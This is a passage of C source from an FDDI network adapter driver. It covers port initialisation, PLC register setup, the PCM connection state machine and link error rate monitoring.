mib->fddiPORTRequestedPaths[1] = MIB_P_PATH_LOCAL ;
mib->fddiPORTRequestedPaths[2] =
MIB_P_PATH_LOCAL |
MIB_P_PATH_PRIM_PREFER ;
mib->fddiPORTRequestedPaths[3] =
MIB_P_PATH_LOCAL |
MIB_P_PATH_PRIM_PREFER |
MIB_P_PATH_CON_PREFER |
MIB_P_PATH_THRU ;
break ;
case TS :
mib->fddiPORTAvailablePaths |= MIB_PATH_S ;
mib->fddiPORTRequestedPaths[1] = MIB_P_PATH_LOCAL ;
mib->fddiPORTRequestedPaths[2] =
MIB_P_PATH_LOCAL |
MIB_P_PATH_CON_ALTER |
MIB_P_PATH_PRIM_PREFER ;
mib->fddiPORTRequestedPaths[3] =
MIB_P_PATH_LOCAL |
MIB_P_PATH_CON_ALTER |
MIB_P_PATH_PRIM_PREFER ;
break ;
case TM :
mib->fddiPORTRequestedPaths[1] = MIB_P_PATH_LOCAL ;
mib->fddiPORTRequestedPaths[2] =
MIB_P_PATH_LOCAL |
MIB_P_PATH_SEC_ALTER |
MIB_P_PATH_PRIM_ALTER ;
mib->fddiPORTRequestedPaths[3] = 0 ;
break ;
}
phy->pc_lem_fail = FALSE ;
mib->fddiPORTPCMStateX = mib->fddiPORTPCMState ;
mib->fddiPORTLCTFail_Ct = 0 ;
mib->fddiPORTBS_Flag = 0 ;
mib->fddiPORTCurrentPath = MIB_PATH_ISOLATED ;
mib->fddiPORTNeighborType = TNONE ;
phy->ls_flag = 0 ;
phy->rc_flag = 0 ;
phy->tc_flag = 0 ;
phy->td_flag = 0 ;
if (np >= PM)
phy->phy_name = '0' + np - PM ;
else
phy->phy_name = 'A' + np ;
phy->wc_flag = FALSE ; /* set by SMT */
memset((char *)&phy->lem,0,sizeof(struct lem_counter)) ;
reset_lem_struct(phy) ;
memset((char *)&phy->plc,0,sizeof(struct s_plc)) ;
phy->plc.p_state = PS_OFF ;
for (i = 0 ; i < NUMBITS ; i++) {
phy->t_next[i] = 0 ;
}
}
real_init_plc(smc) ;
}
void init_plc(struct s_smc *smc)
{
SK_UNUSED(smc) ;
/*
* dummy
* this is an obsolete public entry point that has to remain
* for compat. It is used by various drivers.
* the work is now done in real_init_plc()
* which is called from pcm_init() ;
*/
}
static void real_init_plc(struct s_smc *smc)
{
int p ;
for (p = 0 ; p < NUMPHYS ; p++)
plc_init(smc,p) ;
}
static void plc_init(struct s_smc *smc, int p)
{
int i ;
#ifndef MOT_ELM
int rev ; /* Revision of PLC-x */
#endif /* MOT_ELM */
/* transit PCM state machine to MAINT state */
outpw(PLC(p,PL_CNTRL_B),0) ;
outpw(PLC(p,PL_CNTRL_B),PL_PCM_STOP) ;
outpw(PLC(p,PL_CNTRL_A),0) ;
/*
* if PLC-S then set control register C
*/
#ifndef MOT_ELM
rev = inpw(PLC(p,PL_STATUS_A)) & PLC_REV_MASK ;
if (rev != PLC_REVISION_A)
#endif /* MOT_ELM */
{
if (smc->y[p].pmd_scramble) {
outpw(PLC(p,PL_CNTRL_C),PLCS_CONTROL_C_S) ;
#ifdef MOT_ELM
outpw(PLC(p,PL_T_FOT_ASS),PLCS_FASSERT_S) ;
outpw(PLC(p,PL_T_FOT_DEASS),PLCS_FDEASSERT_S) ;
#endif /* MOT_ELM */
}
else {
outpw(PLC(p,PL_CNTRL_C),PLCS_CONTROL_C_U) ;
#ifdef MOT_ELM
outpw(PLC(p,PL_T_FOT_ASS),PLCS_FASSERT_U) ;
outpw(PLC(p,PL_T_FOT_DEASS),PLCS_FDEASSERT_U) ;
#endif /* MOT_ELM */
}
}
/*
* set timer register
*/
for ( i = 0 ; pltm[i].timer; i++) /* set timer parameter reg */
outpw(PLC(p,pltm[i].timer),pltm[i].para) ;
(void)inpw(PLC(p,PL_INTR_EVENT)) ; /* clear interrupt event reg */
plc_clear_irq(smc,p) ;
outpw(PLC(p,PL_INTR_MASK),plc_imsk_na); /* enable non active irq's */
/*
 * if PCM is configured for class S, it will NOT go to the
 * REMOVE state if offline (page 3-36)
* in the concentrator, all inactive PHYS always must be in
* the remove state
* there's no real need to use this feature at all ..
*/
#ifndef CONCENTRATOR
if ((smc->s.sas == SMT_SAS) && (p == PS)) {
outpw(PLC(p,PL_CNTRL_B),PL_CLASS_S) ;
}
#endif
}
/*
* control PCM state machine
*/
static void plc_go_state(struct s_smc *smc, int p, int state)
{
HW_PTR port ;
int val ;
SK_UNUSED(smc) ;
port = (HW_PTR) (PLC(p,PL_CNTRL_B)) ;
val = inpw(port) & ~(PL_PCM_CNTRL | PL_MAINT) ;
outpw(port,val) ;
outpw(port,val | state) ;
}
/*
* read current line state (called by ECM & PCM)
*/
int sm_pm_get_ls(struct s_smc *smc, int phy)
{
int state ;
#ifdef CONCENTRATOR
if (!plc_is_installed(smc,phy))
return PC_QLS;
#endif
state = inpw(PLC(phy,PL_STATUS_A)) & PL_LINE_ST ;
switch(state) {
case PL_L_QLS:
state = PC_QLS ;
break ;
case PL_L_MLS:
state = PC_MLS ;
break ;
case PL_L_HLS:
state = PC_HLS ;
break ;
case PL_L_ILS4:
case PL_L_ILS16:
state = PC_ILS ;
break ;
case PL_L_ALS:
state = PC_LS_PDR ;
break ;
default :
state = PC_LS_NONE ;
}
return state;
}
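/*
 * load the next group of signaling bits into the PLC transmit vector
 * returns 1 if the PLC is still busy signaling the previous vector,
 * 0 on success
 */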
static int plc_send_bits(struct s_smc *smc, struct s_phy *phy, int len)
{
int np = phy->np ; /* PHY index */
int n ;
int i ;
SK_UNUSED(smc) ;
/* create bit vector */
for (i = len-1,n = 0 ; i >= 0 ; i--) {
n = (n<<1) | phy->t_val[phy->bitn+i] ;
}
if (inpw(PLC(np,PL_STATUS_B)) & PL_PCM_SIGNAL) {
#if 0
printf("PL_PCM_SIGNAL is set\n") ;
#endif
return 1;
}
/* write bit[n] & length = 1 to regs */
outpw(PLC(np,PL_VECTOR_LEN),len-1) ; /* len=nr-1 */
outpw(PLC(np,PL_XMIT_VECTOR),n) ;
#ifdef DEBUG
#if 1
#ifdef DEBUG_BRD
if (smc->debug.d_plc & 0x80)
#else
if (debug.d_plc & 0x80)
#endif
printf("SIGNALING bit %d .. %d\n",phy->bitn,phy->bitn+len-1) ;
#endif
#endif
return 0;
}
/*
* config plc muxes
*/
void plc_config_mux(struct s_smc *smc, int mux)
{
if (smc->s.sas != SMT_DAS)
return ;
if (mux == MUX_WRAPB) {
SETMASK(PLC(PA,PL_CNTRL_B),PL_CONFIG_CNTRL,PL_CONFIG_CNTRL) ;
SETMASK(PLC(PA,PL_CNTRL_A),PL_SC_REM_LOOP,PL_SC_REM_LOOP) ;
}
else {
CLEAR(PLC(PA,PL_CNTRL_B),PL_CONFIG_CNTRL) ;
CLEAR(PLC(PA,PL_CNTRL_A),PL_SC_REM_LOOP) ;
}
CLEAR(PLC(PB,PL_CNTRL_B),PL_CONFIG_CNTRL) ;
CLEAR(PLC(PB,PL_CNTRL_A),PL_SC_REM_LOOP) ;
}
/*
PCM state machine
called by dispatcher & fddi_init() (driver)
do
display state change
process event
until SM is stable
*/
void pcm(struct s_smc *smc, const int np, int event)
{
int state ;
int oldstate ;
struct s_phy *phy ;
struct fddi_mib_p *mib ;
#ifndef CONCENTRATOR
/*
* ignore 2nd PHY if SAS
*/
if ((np != PS) && (smc->s.sas == SMT_SAS))
return ;
#endif
phy = &smc->y[np] ;
mib = phy->mib ;
oldstate = mib->fddiPORTPCMState ;
do {
DB_PCM("PCM %c: state %s%s, event %s",
phy->phy_name,
mib->fddiPORTPCMState & AFLAG ? "ACTIONS " : "",
pcm_states[mib->fddiPORTPCMState & ~AFLAG],
pcm_events[event]);
state = mib->fddiPORTPCMState ;
pcm_fsm(smc,phy,event) ;
event = 0 ;
} while (state != mib->fddiPORTPCMState) ;
/*
* because the PLC does the bit signaling for us,
* we're always in SIGNAL state
	 * the MIB wants to see CONNECT
* we therefore fake an entry in the MIB
*/
if (state == PC5_SIGNAL)
mib->fddiPORTPCMStateX = PC3_CONNECT ;
else
mib->fddiPORTPCMStateX = state ;
#ifndef SLIM_SMT
/*
* path change
*/
if ( mib->fddiPORTPCMState != oldstate &&
((oldstate == PC8_ACTIVE) || (mib->fddiPORTPCMState == PC8_ACTIVE))) {
smt_srf_event(smc,SMT_EVENT_PORT_PATH_CHANGE,
(int) (INDEX_PORT+ phy->np),0) ;
}
#endif
#ifdef FDDI_MIB
/* check whether a snmp-trap has to be sent */
if ( mib->fddiPORTPCMState != oldstate ) {
/* a real state change took place */
DB_SNMP ("PCM from %d to %d\n", oldstate, mib->fddiPORTPCMState);
if ( mib->fddiPORTPCMState == PC0_OFF ) {
/* send first trap */
snmp_fddi_trap (smc, 1, (int) mib->fddiPORTIndex );
} else if ( oldstate == PC0_OFF ) {
/* send second trap */
snmp_fddi_trap (smc, 2, (int) mib->fddiPORTIndex );
} else if ( mib->fddiPORTPCMState != PC2_TRACE &&
oldstate == PC8_ACTIVE ) {
/* send third trap */
snmp_fddi_trap (smc, 3, (int) mib->fddiPORTIndex );
} else if ( mib->fddiPORTPCMState == PC8_ACTIVE ) {
/* send fourth trap */
snmp_fddi_trap (smc, 4, (int) mib->fddiPORTIndex );
}
}
#endif
pcm_state_change(smc,np,state) ;
}
/*
* PCM state machine
*/
static void pcm_fsm(struct s_smc *smc, struct s_phy *phy, int cmd)
{
int i ;
int np = phy->np ; /* PHY index */
struct s_plc *plc ;
struct fddi_mib_p *mib ;
#ifndef MOT_ELM
u_short plc_rev ; /* Revision of the plc */
#endif /* nMOT_ELM */
plc = &phy->plc ;
mib = phy->mib ;
/*
* general transitions independent of state
*/
switch (cmd) {
case PC_STOP :
/*PC00-PC80*/
if (mib->fddiPORTPCMState != PC9_MAINT) {
GO_STATE(PC0_OFF) ;
AIX_EVENT(smc, (u_long) FDDI_RING_STATUS, (u_long)
FDDI_PORT_EVENT, (u_long) FDDI_PORT_STOP,
smt_get_port_event_word(smc));
}
return ;
case PC_START :
/*PC01-PC81*/
if (mib->fddiPORTPCMState != PC9_MAINT)
GO_STATE(PC1_BREAK) ;
return ;
case PC_DISABLE :
/* PC09-PC99 */
GO_STATE(PC9_MAINT) ;
AIX_EVENT(smc, (u_long) FDDI_RING_STATUS, (u_long)
FDDI_PORT_EVENT, (u_long) FDDI_PORT_DISABLED,
smt_get_port_event_word(smc));
return ;
case PC_TIMEOUT_LCT :
/* if long or extended LCT */
stop_pcm_timer0(smc,phy) ;
CLEAR(PLC(np,PL_CNTRL_B),PL_LONG) ;
		/* end of LCT is indicated by PCM_CODE (initiate PCM event) */
return ;
}
switch(mib->fddiPORTPCMState) {
case ACTIONS(PC0_OFF) :
stop_pcm_timer0(smc,phy) ;
outpw(PLC(np,PL_CNTRL_A),0) ;
CLEAR(PLC(np,PL_CNTRL_B),PL_PC_JOIN) ;
CLEAR(PLC(np,PL_CNTRL_B),PL_LONG) ;
sm_ph_lem_stop(smc,np) ; /* disable LEM */
phy->cf_loop = FALSE ;
phy->cf_join = FALSE ;
queue_event(smc,EVENT_CFM,CF_JOIN+np) ;
plc_go_state(smc,np,PL_PCM_STOP) ;
mib->fddiPORTConnectState = PCM_DISABLED ;
ACTIONS_DONE() ;
break ;
case PC0_OFF:
/*PC09*/
if (cmd == PC_MAINT) {
GO_STATE(PC9_MAINT) ;
break ;
}
break ;
case ACTIONS(PC1_BREAK) :
/* Stop the LCT timer if we came from Signal state */
stop_pcm_timer0(smc,phy) ;
ACTIONS_DONE() ;
plc_go_state(smc,np,0) ;
CLEAR(PLC(np,PL_CNTRL_B),PL_PC_JOIN) ;
CLEAR(PLC(np,PL_CNTRL_B),PL_LONG) ;
sm_ph_lem_stop(smc,np) ; /* disable LEM */
/*
* if vector is already loaded, go to OFF to clear PCM_SIGNAL
*/
#if 0
if (inpw(PLC(np,PL_STATUS_B)) & PL_PCM_SIGNAL) {
plc_go_state(smc,np,PL_PCM_STOP) ;
/* TB_MIN ? */
}
#endif
/*
* Go to OFF state in any case.
*/
plc_go_state(smc,np,PL_PCM_STOP) ;
if (mib->fddiPORTPC_Withhold == PC_WH_NONE)
mib->fddiPORTConnectState = PCM_CONNECTING ;
phy->cf_loop = FALSE ;
phy->cf_join = FALSE ;
queue_event(smc,EVENT_CFM,CF_JOIN+np) ;
phy->ls_flag = FALSE ;
phy->pc_mode = PM_NONE ; /* needed by CFM */
phy->bitn = 0 ; /* bit signaling start bit */
for (i = 0 ; i < 3 ; i++)
pc_tcode_actions(smc,i,phy) ;
/* Set the non-active interrupt mask register */
outpw(PLC(np,PL_INTR_MASK),plc_imsk_na) ;
/*
* If the LCT was stopped. There might be a
* PCM_CODE interrupt event present.
* This must be cleared.
*/
(void)inpw(PLC(np,PL_INTR_EVENT)) ;
#ifndef MOT_ELM
/* Get the plc revision for revision dependent code */
plc_rev = inpw(PLC(np,PL_STATUS_A)) & PLC_REV_MASK ;
if (plc_rev != PLC_REV_SN3)
#endif /* MOT_ELM */
{
/*
			 * No Supernet III PLC, so set the XMIT vector and
* length BEFORE starting the state machine.
*/
if (plc_send_bits(smc,phy,3)) {
return ;
}
}
/*
* Now give the Start command.
* - The start command shall be done before setting the bits
		 *   to be signaled. (Per the PLC-S description and the PLCS in SN3.)
* - The start command shall be issued AFTER setting the
* XMIT vector and the XMIT length register.
*
* We do it exactly according this specs for the old PLC and
* the new PLCS inside the SN3.
* For the usual PLCS we try it the way it is done for the
* old PLC and set the XMIT registers again, if the PLC is
* not in SIGNAL state. This is done according to an PLCS
* errata workaround.
*/
plc_go_state(smc,np,PL_PCM_START) ;
/*
* workaround for PLC-S eng. sample errata
*/
#ifdef MOT_ELM
if (!(inpw(PLC(np,PL_STATUS_B)) & PL_PCM_SIGNAL))
#else /* nMOT_ELM */
if (((inpw(PLC(np,PL_STATUS_A)) & PLC_REV_MASK) !=
PLC_REVISION_A) &&
!(inpw(PLC(np,PL_STATUS_B)) & PL_PCM_SIGNAL))
#endif /* nMOT_ELM */
{
/*
* Set register again (PLCS errata) or the first time
* (new SN3 PLCS).
*/
(void) plc_send_bits(smc,phy,3) ;
}
/*
* end of workaround
*/
GO_STATE(PC5_SIGNAL) ;
plc->p_state = PS_BIT3 ;
plc->p_bits = 3 ;
plc->p_start = 0 ;
break ;
case PC1_BREAK :
break ;
case ACTIONS(PC2_TRACE) :
plc_go_state(smc,np,PL_PCM_TRACE) ;
ACTIONS_DONE() ;
break ;
case PC2_TRACE :
break ;
case PC3_CONNECT : /* these states are done by hardware */
case PC4_NEXT :
break ;
case ACTIONS(PC5_SIGNAL) :
ACTIONS_DONE() ;
case PC5_SIGNAL :
if ((cmd != PC_SIGNAL) && (cmd != PC_TIMEOUT_LCT))
break ;
switch (plc->p_state) {
case PS_BIT3 :
for (i = 0 ; i <= 2 ; i++)
pc_rcode_actions(smc,i,phy) ;
pc_tcode_actions(smc,3,phy) ;
plc->p_state = PS_BIT4 ;
plc->p_bits = 1 ;
plc->p_start = 3 ;
phy->bitn = 3 ;
if (plc_send_bits(smc,phy,1)) {
return ;
}
break ;
case PS_BIT4 :
pc_rcode_actions(smc,3,phy) ;
for (i = 4 ; i <= 6 ; i++)
pc_tcode_actions(smc,i,phy) ;
plc->p_state = PS_BIT7 ;
plc->p_bits = 3 ;
plc->p_start = 4 ;
phy->bitn = 4 ;
if (plc_send_bits(smc,phy,3)) {
return ;
}
break ;
case PS_BIT7 :
for (i = 3 ; i <= 6 ; i++)
pc_rcode_actions(smc,i,phy) ;
plc->p_state = PS_LCT ;
plc->p_bits = 0 ;
plc->p_start = 7 ;
phy->bitn = 7 ;
sm_ph_lem_start(smc,np,(int)smc->s.lct_short) ; /* enable LEM */
/* start LCT */
i = inpw(PLC(np,PL_CNTRL_B)) & ~PL_PC_LOOP ;
outpw(PLC(np,PL_CNTRL_B),i) ; /* must be cleared */
outpw(PLC(np,PL_CNTRL_B),i | PL_RLBP) ;
break ;
case PS_LCT :
/* check for local LCT failure */
pc_tcode_actions(smc,7,phy) ;
/*
* set tval[7]
*/
plc->p_state = PS_BIT8 ;
plc->p_bits = 1 ;
plc->p_start = 7 ;
phy->bitn = 7 ;
if (plc_send_bits(smc,phy,1)) {
return ;
}
break ;
case PS_BIT8 :
/* check for remote LCT failure */
pc_rcode_actions(smc,7,phy) ;
if (phy->t_val[7] || phy->r_val[7]) {
plc_go_state(smc,np,PL_PCM_STOP) ;
GO_STATE(PC1_BREAK) ;
break ;
}
for (i = 8 ; i <= 9 ; i++)
pc_tcode_actions(smc,i,phy) ;
plc->p_state = PS_JOIN ;
plc->p_bits = 2 ;
plc->p_start = 8 ;
phy->bitn = 8 ;
if (plc_send_bits(smc,phy,2)) {
return ;
}
break ;
case PS_JOIN :
for (i = 8 ; i <= 9 ; i++)
pc_rcode_actions(smc,i,phy) ;
plc->p_state = PS_ACTIVE ;
GO_STATE(PC6_JOIN) ;
break ;
}
break ;
case ACTIONS(PC6_JOIN) :
/*
* prevent mux error when going from WRAP_A to WRAP_B
*/
if (smc->s.sas == SMT_DAS && np == PB &&
(smc->y[PA].pc_mode == PM_TREE ||
smc->y[PB].pc_mode == PM_TREE)) {
SETMASK(PLC(np,PL_CNTRL_A),
PL_SC_REM_LOOP,PL_SC_REM_LOOP) ;
SETMASK(PLC(np,PL_CNTRL_B),
PL_CONFIG_CNTRL,PL_CONFIG_CNTRL) ;
}
SETMASK(PLC(np,PL_CNTRL_B),PL_PC_JOIN,PL_PC_JOIN) ;
SETMASK(PLC(np,PL_CNTRL_B),PL_PC_JOIN,PL_PC_JOIN) ;
ACTIONS_DONE() ;
cmd = 0 ;
/* fall thru */
case PC6_JOIN :
switch (plc->p_state) {
case PS_ACTIVE:
/*PC88b*/
if (!phy->cf_join) {
phy->cf_join = TRUE ;
queue_event(smc,EVENT_CFM,CF_JOIN+np) ;
}
if (cmd == PC_JOIN)
GO_STATE(PC8_ACTIVE) ;
/*PC82*/
if (cmd == PC_TRACE) {
GO_STATE(PC2_TRACE) ;
break ;
}
break ;
}
break ;
case PC7_VERIFY :
break ;
case ACTIONS(PC8_ACTIVE) :
/*
* start LEM for SMT
*/
sm_ph_lem_start(smc,(int)phy->np,LCT_LEM_MAX) ;
phy->tr_flag = FALSE ;
mib->fddiPORTConnectState = PCM_ACTIVE ;
/* Set the active interrupt mask register */
outpw(PLC(np,PL_INTR_MASK),plc_imsk_act) ;
ACTIONS_DONE() ;
break ;
case PC8_ACTIVE :
/*PC81 is done by PL_TNE_EXPIRED irq */
/*PC82*/
if (cmd == PC_TRACE) {
GO_STATE(PC2_TRACE) ;
break ;
}
/*PC88c: is done by TRACE_PROP irq */
break ;
case ACTIONS(PC9_MAINT) :
stop_pcm_timer0(smc,phy) ;
CLEAR(PLC(np,PL_CNTRL_B),PL_PC_JOIN) ;
CLEAR(PLC(np,PL_CNTRL_B),PL_LONG) ;
CLEAR(PLC(np,PL_INTR_MASK),PL_LE_CTR) ; /* disable LEM int. */
sm_ph_lem_stop(smc,np) ; /* disable LEM */
phy->cf_loop = FALSE ;
phy->cf_join = FALSE ;
queue_event(smc,EVENT_CFM,CF_JOIN+np) ;
plc_go_state(smc,np,PL_PCM_STOP) ;
mib->fddiPORTConnectState = PCM_DISABLED ;
SETMASK(PLC(np,PL_CNTRL_B),PL_MAINT,PL_MAINT) ;
sm_ph_linestate(smc,np,(int) MIB2LS(mib->fddiPORTMaint_LS)) ;
outpw(PLC(np,PL_CNTRL_A),PL_SC_BYPASS) ;
ACTIONS_DONE() ;
break ;
case PC9_MAINT :
DB_PCMN(1, "PCM %c : MAINT", phy->phy_name);
/*PC90*/
if (cmd == PC_ENABLE) {
GO_STATE(PC0_OFF) ;
break ;
}
break ;
default:
SMT_PANIC(smc,SMT_E0118, SMT_E0118_MSG) ;
break ;
}
}
/*
* force line state on a PHY output (only in MAINT state)
*/
static void sm_ph_linestate(struct s_smc *smc, int phy, int ls)
{
int cntrl ;
SK_UNUSED(smc) ;
cntrl = (inpw(PLC(phy,PL_CNTRL_B)) & ~PL_MAINT_LS) |
PL_PCM_STOP | PL_MAINT ;
switch(ls) {
case PC_QLS: /* Force Quiet */
cntrl |= PL_M_QUI0 ;
break ;
case PC_MLS: /* Force Master */
cntrl |= PL_M_MASTR ;
break ;
case PC_HLS: /* Force Halt */
cntrl |= PL_M_HALT ;
break ;
default :
case PC_ILS: /* Force Idle */
cntrl |= PL_M_IDLE ;
break ;
case PC_LS_PDR: /* Enable repeat filter */
cntrl |= PL_M_TPDR ;
break ;
}
outpw(PLC(phy,PL_CNTRL_B),cntrl) ;
}
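/*
 * reset the LEM estimate to its initial value (LER estimate 10E-15)
 */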
static void reset_lem_struct(struct s_phy *phy)
{
struct lem_counter *lem = &phy->lem ;
phy->mib->fddiPORTLer_Estimate = 15 ;
lem->lem_float_ber = 15 * 100 ;
}
/*
* link error monitor
*/
static void lem_evaluate(struct s_smc *smc, struct s_phy *phy)
{
int ber ;
u_long errors ;
struct lem_counter *lem = &phy->lem ;
struct fddi_mib_p *mib ;
int cond ;
mib = phy->mib ;
if (!lem->lem_on)
return ;
errors = inpw(PLC(((int) phy->np),PL_LINK_ERR_CTR)) ;
lem->lem_errors += errors ;
mib->fddiPORTLem_Ct += errors ;
errors = lem->lem_errors ;
/*
	 * the calculation is called on an interval of 8 seconds
	 * -> this means that one error in 8 sec. is one in 8*125*10E6 bits,
	 *    the same as BER = 10E-9
* Please note:
* -> 9 errors in 8 seconds mean:
* BER = 9 * 10E-9 and this is
* < 10E-8, so the limit of 10E-8 is not reached!
*/
if (!errors) ber = 15 ;
else if (errors <= 9) ber = 9 ;
else if (errors <= 99) ber = 8 ;
else if (errors <= 999) ber = 7 ;
else if (errors <= 9999) ber = 6 ;
else if (errors <= 99999) ber = 5 ;
else if (errors <= 999999) ber = 4 ;
else if (errors <= 9999999) ber = 3 ;
else if (errors <= 99999999) ber = 2 ;
else if (errors <= 999999999) ber = 1 ;
else ber = 0 ;
/*
* weighted average
*/
ber *= 100 ;
lem->lem_float_ber = lem->lem_float_ber * 7 + ber * 3 ;
lem->lem_float_ber /= 10 ;
mib->fddiPORTLer_Estimate = lem->lem_float_ber / 100 ;
if (mib->fddiPORTLer_Estimate < 4) {
mib->fddiPORTLer_Estimate = 4 ;
}
if (lem->lem_errors) {
DB_PCMN(1, "LEM %c :", phy->np == PB ? 'B' : 'A');
DB_PCMN(1, "errors : %ld", lem->lem_errors);
DB_PCMN(1, "sum_errors : %ld", mib->fddiPORTLem_Ct);
DB_PCMN(1, "current BER : 10E-%d", ber / 100);
DB_PCMN(1, "float BER : 10E-(%d/100)", lem->lem_float_ber);
DB_PCMN(1, "avg. BER : 10E-%d", mib->fddiPORTLer_Estimate);
}
lem->lem_errors = 0L ;
#ifndef SLIM_SMT
cond = (mib->fddiPORTLer_Estimate <= mib->fddiPORTLer_Alarm) ?
TRUE : FALSE ;
#ifdef SMT_EXT_CUTOFF
smt_ler_alarm_check(smc,phy,cond) ;
#endif /* nSMT_EXT_CUTOFF */
if (cond != mib->fddiPORTLerFlag) {
smt_srf_event(smc,SMT_COND_PORT_LER,
(int) (INDEX_PORT+ phy->np) ,cond) ;
}
#endif
if ( mib->fddiPORTLer_Estimate <= mib->fddiPORTLer_Cutoff) {
phy->pc_lem_fail = TRUE ; /* flag */
mib->fddiPORTLem_Reject_Ct++ ;
/*
* "forgive 10e-2" if we cutoff so we can come
* up again ..
*/
lem->lem_float_ber += 2*100 ;
/*PC81b*/
#ifdef CONCENTRATOR
DB_PCMN(1, "PCM: LER cutoff on port %d cutoff %d",
phy->np, mib->fddiPORTLer_Cutoff);
#endif
#ifdef SMT_EXT_CUTOFF
smt_port_off_event(smc,phy->np);
#else /* nSMT_EXT_CUTOFF */
queue_event(smc,(int)(EVENT_PCM+phy->np),PC_START) ;
#endif /* nSMT_EXT_CUTOFF */
}
}
/*
* called by SMT to calculate LEM bit error rate
*/
void sm_lem_evaluate(struct s_smc *smc)
{
int np ;
for (np = 0 ; np < NUMPHYS ; np++)
lem_evaluate(smc,&smc->y[np]) ;
}
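/*
 * check the link error counter at the end of the LCT and set
 * pc_lem_fail if the error limit for the chosen LCT duration
 * was exceeded
 */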
static void lem_check_lct(struct s_smc *smc, struct s_phy *phy)
{
struct lem_counter *lem = &phy->lem ;
struct fddi_mib_p *mib ;
int errors ;
mib = phy->mib ;
phy->pc_lem_fail = FALSE ; /* flag */
errors = inpw(PLC(((int)phy->np),PL_LINK_ERR_CTR)) ;
lem->lem_errors += errors ;
mib->fddiPORTLem_Ct += errors ;
if (lem->lem_errors) {
switch(phy->lc_test) {
case LC_SHORT:
if (lem->lem_errors >= smc->s.lct_short)
phy->pc_lem_fail = TRUE ;
break ;
case LC_MEDIUM:
if (lem->lem_errors >= smc->s.lct_medium)
phy->pc_lem_fail = TRUE ;
break ;
case LC_LONG:
if (lem->lem_errors >= smc->s.lct_long)
phy->pc_lem_fail = TRUE ;
break ;
case LC_EXTENDED:
if (lem->lem_errors >= smc->s.lct_extended)
phy->pc_lem_fail = TRUE ;
break ;
}
DB_PCMN(1, " >>errors : %lu", lem->lem_errors);
}
if (phy->pc_lem_fail) {
mib->fddiPORTLCTFail_Ct++ ;
mib->fddiPORTLem_Reject_Ct++ ;
}
else
mib->fddiPORTLCTFail_Ct = 0 ;
}
/*
* LEM functions
*/
static void sm_ph_lem_start(struct s_smc *smc, int np, int threshold)
{
struct lem_counter *lem = &smc->y[np].lem ;
lem->lem_on = 1 ;
lem->lem_errors = 0L ;
/* Do NOT reset mib->fddiPORTLer_Estimate here. It is called too
* often.
*/
outpw(PLC(np,PL_LE_THRESHOLD),threshold) ;
(void)inpw(PLC(np,PL_LINK_ERR_CTR)) ; /* clear error counter */
/* enable LE INT */
SETMASK(PLC(np,PL_INTR_MASK),PL_LE_CTR,PL_LE_CTR) ;
}
static void sm_ph_lem_stop(struct s_smc *smc, int np)
{
struct lem_counter *lem = &smc->y[np].lem ;
lem->lem_on = 0 ;
CLEAR(PLC(np,PL_INTR_MASK),PL_LE_CTR) ;
}
/* ARGSUSED */
void sm_pm_ls_latch(struct s_smc *smc, int phy, int on_off)
/* int on_off; en- or disable ident. ls */
{
SK_UNUSED(smc) ;
phy = phy ; on_off = on_off ;
}
/*
* PCM pseudo code
* receive actions are called AFTER the bit n is received,
* i.e. if pc_rcode_actions(5) is called, bit 6 is the next bit to be received
*/
/*
* PCM pseudo code 5.1 .. 6.1
*/
static void pc_rcode_actions(struct s_smc *smc, int bit, struct s_phy *phy)
{
struct fddi_mib_p *mib ;
mib = phy->mib ;
DB_PCMN(1, "SIG rec %x %x:", bit, phy->r_val[bit]);
bit++ ;
switch(bit) {
case 0:
case 1:
case 2:
break ;
case 3 :
if (phy->r_val[1] == 0 && phy->r_val[2] == 0)
mib->fddiPORTNeighborType = TA ;
else if (phy->r_val[1] == 0 && phy->r_val[2] == 1)
mib->fddiPORTNeighborType = TB ;
else if (phy->r_val[1] == 1 && phy->r_val[2] == 0)
mib->fddiPORTNeighborType = TS ;
else if (phy->r_val[1] == 1 && phy->r_val[2] == 1)
mib->fddiPORTNeighborType = TM ;
break ;
case 4:
if (mib->fddiPORTMy_Type == TM &&
mib->fddiPORTNeighborType == TM) {
DB_PCMN(1, "PCM %c : E100 withhold M-M",
phy->phy_name);
mib->fddiPORTPC_Withhold = PC_WH_M_M ;
RS_SET(smc,RS_EVENT) ;
}
else if (phy->t_val[3] || phy->r_val[3]) {
mib->fddiPORTPC_Withhold = PC_WH_NONE ;
if (mib->fddiPORTMy_Type == TM ||
mib->fddiPORTNeighborType == TM)
phy->pc_mode = PM_TREE ;
else
phy->pc_mode = PM_PEER ;
/* reevaluate the selection criteria (wc_flag) */
all_selection_criteria (smc);
if (phy->wc_flag) {
mib->fddiPORTPC_Withhold = PC_WH_PATH ;
}
}
else {
mib->fddiPORTPC_Withhold = PC_WH_OTHER ;
RS_SET(smc,RS_EVENT) ;
DB_PCMN(1, "PCM %c : E101 withhold other",
phy->phy_name);
}
phy->twisted = ((mib->fddiPORTMy_Type != TS) &&
(mib->fddiPORTMy_Type != TM) &&
(mib->fddiPORTNeighborType ==
mib->fddiPORTMy_Type)) ;
if (phy->twisted) {
DB_PCMN(1, "PCM %c : E102 !!! TWISTED !!!",
phy->phy_name);
}
break ;
case 5 :
break ;
case 6:
if (phy->t_val[4] || phy->r_val[4]) {
if ((phy->t_val[4] && phy->t_val[5]) ||
(phy->r_val[4] && phy->r_val[5]) )
phy->lc_test = LC_EXTENDED ;
else
phy->lc_test = LC_LONG ;
}
else if (phy->t_val[5] || phy->r_val[5])
phy->lc_test = LC_MEDIUM ;
else
phy->lc_test = LC_SHORT ;
switch (phy->lc_test) {
case LC_SHORT : /* 50ms */
outpw(PLC((int)phy->np,PL_LC_LENGTH), TP_LC_LENGTH ) ;
phy->t_next[7] = smc->s.pcm_lc_short ;
break ;
case LC_MEDIUM : /* 500ms */
outpw(PLC((int)phy->np,PL_LC_LENGTH), TP_LC_LONGLN ) ;
phy->t_next[7] = smc->s.pcm_lc_medium ;
break ;
case LC_LONG :
SETMASK(PLC((int)phy->np,PL_CNTRL_B),PL_LONG,PL_LONG) ;
phy->t_next[7] = smc->s.pcm_lc_long ;
break ;
case LC_EXTENDED :
SETMASK(PLC((int)phy->np,PL_CNTRL_B),PL_LONG,PL_LONG) ;
phy->t_next[7] = smc->s.pcm_lc_extended ;
break ;
}
if (phy->t_next[7] > smc->s.pcm_lc_medium) {
start_pcm_timer0(smc,phy->t_next[7],PC_TIMEOUT_LCT,phy);
}
DB_PCMN(1, "LCT timer = %ld us", phy->t_next[7]);
phy->t_next[9] = smc->s.pcm_t_next_9 ;
break ;
case 7:
if (phy->t_val[6]) {
phy->cf_loop = TRUE ;
}
phy->td_flag = TRUE ;
break ;
case 8:
